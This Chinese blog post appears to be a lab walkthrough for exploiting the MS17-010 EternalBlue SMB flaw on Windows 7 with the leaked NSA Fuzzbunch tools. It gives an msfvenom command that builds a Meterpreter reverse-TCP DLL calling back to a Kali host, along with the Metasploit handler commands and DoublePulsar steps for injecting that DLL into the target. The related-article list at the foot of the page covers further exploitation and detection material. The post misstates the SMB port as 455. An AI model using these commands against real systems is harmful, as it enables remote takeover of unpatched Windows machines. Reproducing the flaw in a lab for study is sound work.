Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN

最新推荐文章于 2024-08-22 22:18:32 发布
最新推荐文章于 2024-08-22 22:18:32 发布
阅读量3.3k 收藏 2
点赞数
分类专栏: 网络渗透 文章标签: 网络 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/void_zk/article/details/122659630
版权

Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN

一、原理
1.Eternalblue可以利用SMB漏洞,结合Doublepulsar后,获取Windows 7 系统权限
2.漏洞存在环境
几乎所有开放455端口的Win系统
3. SMB
一个网络文件共享协议

二、实验准备

攻击机:win7 64 IP:192.168.226.128
靶机:win7 64 CN IP: 192.168.226.129
辅助攻击机:kali IP : 192.168.226.130

三、实验过程
在这里插入图片描述
设定IP
在这里插入图片描述
进入fb> use Eternalblue
一路enter 默认选项,只有下框中红色的选1
在这里插入图片描述
出现 Eternalblue Succeed代表攻击成功。
接下来是利用kali生成后门文件 1.dll

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.226.130 LPORT=8888 -f dll > 1.dll

其中lhost就是辅助攻击机的ip
在这里插入图片描述
然后打开 mfs6
$ msfconsole
在这里插入图片描述
输入以下命令:

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set LhOST 192.168.226.130
msf6 exploit(multi/handler) > set lport 8888
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

在这里插入图片描述
生成1.dll并且开始监听

将1.dll放入攻击机(使用VM TOOLS)

在这里插入图片描述

使用DoublePulsar执行后门

>use DoublePulsar

一路enter默认,注意以下设置
![在这里插入图片描述](https://img-blog.csdnimg.cn/eda0bbed3d9046a687dee44150f5f97a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAUWlRaV9DbGlmZg==,size_20,color_FFFFFF,t_70,g_se,x_16

再enter,直到出现Doublepulsar Succeed,代表执行成功

在这里插入图片描述

再看kali,已经成功实现
在这里插入图片描述

欢迎指正交流!!!

23hours
关注
专栏目录
win7永恒之蓝微软官方补丁
05-16
永恒之蓝”(EternalBlue)是一种利用Windows系统漏洞的攻击工具,最初由美国国家安全局(NSA)开发,后被泄露到互联网上。该漏洞主要影响Windows 7、Windows Server 2008 R2以及更早版本的操作系统。一旦被利用,...
fuzzbunch工具实现dll注入
Ms08067安全实验室
07-20 968
文章来源|MS08067内网安全知识星球本文作者:BlackCat(Ms08067 内网小组成员)前言上阶段无意间接触到了这个工具,感觉功能还可以,在最近的hw中,测试发现,在一些08的...
linux运行fuzzbunch,[原创]漏洞永恒之蓝(简单复现)
weixin_39628070的博客
05-10 248
漏洞分析之永恒之蓝(ms17-010)目录☛ 1.漏洞介绍1.漏洞描述Eternalblue通过 TCP 端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows机器,无需用户任何操作,只要开机上网,就能在电脑中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序2.漏洞影响目前已知受影响的windows版本包括但不限于:Windows ...
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
08-22 1278
永恒之蓝EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
FuzzBunch之payload—Regdelete复现(win7)
ckm1607011的博客
07-15 627
FuzzBunch资源:https://github.com/misterch0c/shadowbroker,从GitHub上下载下来解压为 我要复现的是windows的工具windows文件夹下payloads子文件夹下的工具Regdelete exe作为插件,通过FuzzBunch框架调用运行,具体可以参见这篇博客:https://blog.csdn.net/yiyiiyiy/article/details/78627053 FuzzBunch框架配置好之后,按win+R快捷键,输入cmd进入命
Cobalt Strike DLL用于永恒之蓝注入
46的十哥哥的5哥哥
02-05 2351
来自:5号黯区 5号黯区是一支致力于红队攻防研究与培训的团队,官网:http://www.dark5.net 我们在对存在MS17010的漏洞主机进行DLL注入的时候,一般都是用的Meataploit的msfvenom生成出来的,所以每次上线之后基本都是要经过相对比较繁琐的操作之后转到Cobalt Strike去,这样就会显得非常麻烦。 所以可以使用metasploit的msfvenom来...
网安永恒之蓝检测工具
04-02
总的来说,"网安永恒之蓝检测工具"是针对MS17-010漏洞的一款重要防御工具,它的存在帮助用户和管理员能够及时识别并修复可能被永恒之蓝利用的系统,从而提高网络安全防护能力。定期使用此类工具进行检测,可以有效...
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝检测.zip
10-20
1. **永恒之蓝漏洞**:MS17-010漏洞是由美国国家安全局(NSA)开发的网络武器工具泄露后,被黑客组织利用发起的攻击。它利用SMB服务的漏洞,允许攻击者远程执行代码,无需用户交互。 2. **WannaCry勒索软件**:利用...
永恒之蓝EternalBlue/Wannacry分析
12-24
永恒之蓝利用的是Windows SMB服务中的一个缓冲区溢出漏洞。当攻击者向目标系统发送特制的数据包时,如果目标系统存在该漏洞,则可能导致内存中的数据被错误地覆盖,进而使得攻击者能够执行任意代码。漏洞的核心在于...
探秘NSA的暗影工具箱:Fuzzbunch深度解析与应用指南
gitblog_00017的博客
06-01 456
探秘NSA的暗影工具箱:Fuzzbunch深度解析与应用指南 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在网络安全的深层领域,潜藏着一个源自美国国家安全局(NSA)的强大工具——Fuzzbunch。这个框架,正如其神秘背景一般,自Shadow Brokers泄露以来,一直是安全研究人员和黑客界热议的焦点。它是一个高度复杂的漏洞利用平台,集合了多种针对操作系统关键...
linux运行fuzzbunch,方程式0day ETERNALBLUE复现之Empire &ampamp; Msfconsole下的she...
weixin_29292431的博客
05-10 208
在本文中我将为大家复现在前段时间被曝出的,方程式0day Eternalblue利用过程。Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞。从涵盖的操作系统版本来看,Eternalblue针对的范围也非常广泛。从Windows XP到Windows Server 2012都为其攻击对象。而Windows 10和Windows Server 2016,...
永恒之蓝漏洞复现及上传后门程序
dreamthe的博客
11-18 3831
自己实在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,自己去选择版本 这里记得选择桥接模式 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 可以ka里面用nmap扫描靶机开了那些端口 输入msfdb run 进入msf中 开始搜索ms17_010 命令 search ms17_010 先使用aux模块扫描靶机有无漏洞 步骤如下 第一步 使用扫描模块 use a...
关于NSAEternalBlue永恒之蓝) ms17-010漏洞利用
热门推荐
cnbluerain的博客
05-19 2万+
NSAEternalBlue永恒之蓝) ms17-010 漏洞利用
nsa服务器win7系统,Win7系统访问NAS和Samba服务器失败怎么处理
weixin_39955154的博客
08-06 563
NAS/Samba服务器是两种服务器 ,主要的作用便是实现文件间的共享,对于经常需要使用共享功能的朋友来说是一款不错的工具。但是最近有用户向小编询问win7系统NAS/Samba服务器访问失败,该怎么解决这个问题呢?其实我们可以通过注册表来解决Win7系统访问NAS和Samba服务器失败的问题,下面小编介绍故障原因及解决方法。故障原因:win7出现这样的情况是因为认只采用NTLM v2协议的认证回...
win nas官网
05-26 4708
这是一个由微软出品的网络附加存储设备。Win NAS官网提供产品的下载和相关的技术支持。Win NAS官网是。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值